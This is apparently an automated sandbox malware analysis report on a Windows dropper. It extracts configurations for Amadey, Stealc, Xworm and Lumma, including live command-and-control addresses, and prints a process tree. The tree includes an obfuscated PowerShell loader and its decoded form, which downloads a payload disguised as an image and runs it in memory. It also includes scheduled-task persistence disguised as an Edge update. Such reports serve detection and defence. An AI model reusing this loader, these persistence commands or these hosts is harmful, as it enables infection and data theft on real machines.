Overview

overview

10

Static

static

3

3bd4b07526...d7.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 16:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7.exe

  • Size

    5.6MB

  • MD5

    6b0326092618a9d22a8266da42448465

  • SHA1

    b5dfdcf95f293f6e203dd7a4b22f46b1806c3456

  • SHA256

    3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7

  • SHA512

    59b1c66b79c700e46912f586e2f239a5a130291b63864aa22decd34f9d5e2ec5c72ccee22b64653df6c27b0f87e38ccc07c93b4ce17b05911fdcbe02187c09a5

  • SSDEEP

    98304:BxuIJX4CqRz7gOSUOgJ2DyrescS44vAgb9ZF6vH9NPc3SKNYJlzB6DHdH/u1KCsl:B7zqRz7gMJAyCsJrx2/YYJ14hfudsl

Score
10/10
amadeyhealerlummastealcstormkittyxworm9c9aa5bratdefense_evasiondiscoverydropperevasionexecutionpersistenceratstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

xworm

Version

5.0

C2

91.212.166.99:4404

Mutex

f35pmRFzPiiasEf1

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    dllhost.exe

aes.plain

Extracted

Family

lumma

C2

https://toppyneedus.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Xworm Payload 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
    defense_evasion
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to execute payload.

    execution
  • Downloads MZ/PE file 8 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 6 IoCs
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7.exe
    "C:\Users\Admin\AppData\Local\Temp\3bd4b07526fe9acb5766a4cb72586ddb0d936ab3b9bdac0e4d259e610df42ad7.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4436
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5w56.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5w56.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\k9P43.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\k9P43.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3548
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1C08t5.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1C08t5.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4424
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
              "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2292
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2104
            • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
              "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1828
            • C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe
              "C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4792
            • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
              "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3540
              • C:\Users\Admin\AppData\Local\Temp\is-Q26E7.tmp\IJWSn6z.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-Q26E7.tmp\IJWSn6z.tmp" /SL5="$E0054,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1516
                • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
                  "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2620
                  • C:\Users\Admin\AppData\Local\Temp\is-759QH.tmp\IJWSn6z.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-759QH.tmp\IJWSn6z.tmp" /SL5="$A0266,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    PID:3624
                    • C:\Windows\SysWOW64\regsvr32.exe
                      "regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                      10⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:3020
                      • C:\Windows\system32\regsvr32.exe
                        /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                        11⤵
                        • Loads dropped DLL
                        • Suspicious behavior: AddClipboardFormatListener
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:5020
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                          12⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1532
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4F9B2662-A185-4054-FBFB-A54B9E8365FC}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
                          12⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3340
                        • C:\Windows\System32\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dllhost" /tr "C:\Users\Admin\AppData\Local\dllhost.exe"
                          12⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3068
            • C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe
              "C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1068
            • C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe
              "C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:4260
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                7⤵
                • System Location Discovery: System Language Discovery
                PID:620
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  PID:3544
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4436
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  PID:2292
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2224
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 764661
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2204
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Fm
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:456
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "Tunnel" Addresses
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:5100
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:432
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3572
                • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
                  Macromedia.com F
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1596
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:4700
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    9⤵
                      PID:3548
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 15
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2352
              • C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe
                "C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4496
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c 67938ad15f2a9.vbs
                  7⤵
                  • Checks computer location settings
                  • Modifies registry class
                  PID:2712
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67938ad15f2a9.vbs"
                    8⤵
                    • Checks computer location settings
                    PID:5116
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1012
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                        10⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2736
          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2e8001.exe
            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2e8001.exe
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
